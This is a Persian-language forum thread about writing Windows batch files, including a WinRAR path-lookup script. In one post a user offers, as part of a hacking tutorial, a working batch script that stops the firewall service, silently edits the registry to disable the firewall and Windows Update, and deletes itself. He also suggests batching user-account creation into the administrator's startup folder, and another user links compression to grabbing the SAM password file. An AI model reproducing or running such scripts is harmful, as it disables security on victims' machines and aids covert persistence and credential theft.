سلام دوستان من چند تا كد كوچولو نياز دارم كه به صورت batch كد نوشته بشه يا همون پسوند bat
اگه كسي معلوماتي داره بگه ازش سئوال كنم
ممنون مي شم
سلام دوستان من چند تا كد كوچولو نياز دارم كه به صورت batch كد نوشته بشه يا همون پسوند bat
اگه كسي معلوماتي داره بگه ازش سئوال كنم
ممنون مي شم
سلام
خب شما سوالت را مطرح کن هر کی بلد بود جواب میده .
موفق باشید .
سلام دوست عزیز.
داخل درایو C سیستمت یه فایل بساز به نام:
بعد Notpad رو باز کن و توی اون تایپ کن:کد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
حالا اونو با پسوند bat ذخیره کن و اجرا کن.میبینی که فایلی که در درایو C ساختی پاک شد.این یه دستور از Dos بود برای حذف یه فایل.فایل های Bat یه سری فایل های اجرایی هستند مثل Exe ولی تو توی اون میتونی از فرامین Dos هم استفاده کنی که تحت Dos اجرا میشه.البته بعضی از ویروس های سیستمی هم با پسوند Bat ذخیره و اجرا میشن.کد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
با تشكر از دوستان مخصوصا hamishebahar
من نگفتم چطور فايل bat بسازيم !
ولي در حال اگر از تكنيك هاي اين سبك برنامه نويسي اطلاع داريد بفرمائيد تا سئوالم را مطرح كنم
من در رابطه با فشرده كردن با winrar يه مشكل دارم
كدهاش رو پيدا كردم ولي مشكل اينه كه بايد يه سري تعريفات جداگونه صورت بگيره
میشه سوالت رو دقیقتر مطرح کنی این الان کمکی به حل مشکلت نمی کنه
مثلا کدها رو بذار و دقیقا بگو باهاشون می خوای چیکار کنی و چه ربطی به فایل batch داره کارت
سلام دوست خوبم
در تايپيك آموزش هك توضيح دادم
Batch File بچ فايل چيست؟
امروز يه نكته بين آموزشي داريم!!!
بچ فايل كدهايي بودن كه در قديم(همين Dos خودمون كه تو ايران جديده!!!!!) استفاده ميشدند
در گذشته چون از خط فرمان استفاده گسترده ميشد مانند يونيكس و داس براي بعضي كارهاي تكراري و فرمانها از Batch استفاده ميشد كه شبه زبان هم به حساب مياد
الان ميشه اين كدهارو تو Notepad نوشت و با پسوند Bat سيو كرد و تو لوكال(كامپيوتر شخصي) يا ريموت (مثلا يه سرور) و ......... ازش استفاده كرد
پس خيلي مهمه
براي مثال كد زير رو تو Notepad كپي پيست كنيد و سپس با پسوند bat(مثلا majeed.bat) سيو كنيد و سپس اجرا
توضيح اين كد با دستكاري تو رجيستري و ......باعث غير فعال شدن فايروال ميشه با echo شروع م
كه ميشه خيلي كارا با بچ فايلها كرد
@echo off
net stop SharedAccess
ECHO REGEDIT4 >"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO.>> "%Temp%.\kill.reg"
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Exit
اين سايت هم بچ فايلهاي خوبي داره اين يه نمونه
کد:
اين هم بچ فايل بالا كه با پسوند bat سيو كردم و بعد از اجرا حذف ميشه براي ديدن محتويات هم روش كليك رايت كنيد وسپس Editکد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
کد:
يه نكته كه لازمه بايد بگم دستوراتي رو كه براي ساختن يوزر گفتيم ميشه بچ كرد و تو استارت آپ ادمين گذاشت!!!!کد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ديگه ابتكار با خوتون حس نفوذگري رو بكار بندازين
By:Majeed $ 2007
فشرده سازي در رابطه با Winrar تحت داس هست؟(براي بدست آوردن Sam يا .........)
لطفا بيشتر توضيح بديد
کد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
کارهایی که شما باید دونه به دونه توی Command بنویسید و انجام بدید را می تونید توی یه محیط متنی مثل notpad نوشته و با یکبار اجرا تمامی تغییرات را به یکباره اعمال کنید .
بیشتر باید دستورات Command را بلد باشید . یا همون DOS
موفق باشید .
با سلام خدمت دوستان
خيلي خوب من 5چند تا سئوال دارم هر كس كه مي نونه يكي رو و يا بيشتر رو جواب بده
(تشكر پيشاپيش)
=========================
در دستور زير
برنامه winrar يك فايل متني به نام my.txt را با پسوند rar فشرده مي كند و به نام my.rar ذخيره مي كندset path=C:\program files\winrar\;%path%
WinRAR A my.rar my.txt
فرض را براين بگذاريم كه برنامه winrar در درايوي به غير از درايو C نصب بود و پوشه اي غير از پوشه مقرر خود
بنابراين دستور فوق عمل نخواهد كرد
اكنون سئوال اول اينجاست=
دستوري تايپ كنيد كه در صورت نادرست بودن مسير برنامه WINRAR از طريق يك فايل متني به نام winrar path.txt كه در درايو C كپي شده مسير صحيح برنامه يافت شود
مسير دقيق فايل txt حاوي آدرس === C:\winrar ptch.txt
ممنون و با تشكر فراوان
در صورتي كه توانستيد جواب صحيح را بيابيد سپاسگذار مي شوم براي ديدن پرسش بعدي مجددا به تاپيك مراجعه كنيد
سلام
فقط مشكل اينه كه اين فايل فقط توي هر درايوي كه كپي بشه همون درايو رو فقط مي گرده بايد براي كلي كردنش یه حلقه عجیب غریب بنويسمکد:برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ممنونم دوست عزيزم Ar@m
كد بسيار خوبي است كار هم مي كند نيازي به نوشتن حلقه نيست كد هاي زير هر جائي كه برنامه winrar نصب باشد را مي يابد فقط كافيست كه رزيدنت باشد !!
البته من جواب را در يكي از تاپيك هاي پرس و جوي اجنبي يافتم !!@echo off & setlocal
for /f "tokens=*" %%a in ('ftype winrar') do set %%a
set winrar=%winrar:" "="&REM.%
set winrar
pause
:testing
%winrar% a test.rar *.txt
pause
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)